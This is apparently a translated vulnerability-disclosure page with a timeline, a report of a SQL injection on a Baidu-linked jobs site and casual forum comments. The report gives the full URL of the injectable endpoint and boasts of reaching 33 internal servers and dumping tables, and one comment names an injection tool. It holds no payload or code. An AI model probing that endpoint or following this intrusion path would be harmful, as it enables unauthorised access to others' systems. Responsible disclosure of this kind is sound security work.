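2012-05-31: Details reported to the vendor; awaiting vendor response
2012-05-31: Vendor has confirmed; details disclosed to the vendor only
2012-06-10: Details disclosed to core white hats and experts in related fields
2012-06-20: Details disclosed to regular white hats
2012-06-30: Details disclosed to intern white hats
2012-07-15: Details disclosed to the public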
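A certain Baidu site has a security flaw that allows penetration into the internal network and the takeover of 33 servers. To protect this site, I definitely can't say which one. Sigh, 36 servers; excluding the local machine, that makes 33 internal servers. I won't mention the passwords. I won't go into the privileges either; dumping the tables takes forever. Nothing about the direction has been leaked. I can't take it, I just can't take it. A bloodbath caused by a single injection, a bloodbath. Want to know why? Please wait for the public disclosure, dear. We hope this one gets featured; I'm set on getting the 20 points. If you like it, bump the post and show your support.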
The culprit of the bloodbath: http://www.baijob.com/p/Searchcompany/industry?id=9&parent_id=1
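By my count last night, the above comes to 33 internal servers, exposed just like that. Sigh, and most of the servers share the same password. What a tragedy.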
Strengthen the security system; this kind of bloodbath is still fairly typical!
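Severity: High
Vulnerability Rank: 20
Confirmed: 2012-05-31 11:26
Awarding 20 points as thanks; thank you for staying up late hunting for vulnerabilities~
2012-05-31: Also note that this domain is not a Baidu domain and is outside our jurisdiction.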
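Haha, the reporter is impressive.
Bump.
This is just Baijob (百伯); it doesn't really count as Baidu's.
Haha! You want to be number two that badly? You're really going all out! If the server cluster with this problem is large and is core business, I'd support marking your post as featured!
The posters above have started arguing; watching from the sidelines.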
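@shine The database tables assigned to all sorts of servers were dumped. It's pretty obvious, bro.
Made a typo. Oh no, I posted it to the mobile main site.
@zeracker Is it really more serious than something that affects the entire core business application?
Impressive!
@zeracker Haha! Fine, I'll let you be number two for a while; enjoy it!
@shine %>_<%... I'm going to get flamed to death... go ahead, flame away.
@Jannock The big boss said it's always by accident; yesterday mine was by accident too. Really.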
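@百度 You can't do it like this, can you?
Sigh, nobody admits it's a big problem.
Latest status: 2012-05-31: Also note that this domain is not a Baidu domain and is outside our jurisdiction.
The 20 is to console your fragile little heart; everything is so silly these days.
Each one fiercer than the last~~
@gainover All those featured posts, all that envy, jealousy and hatred.
Havij doesn't work on Win7.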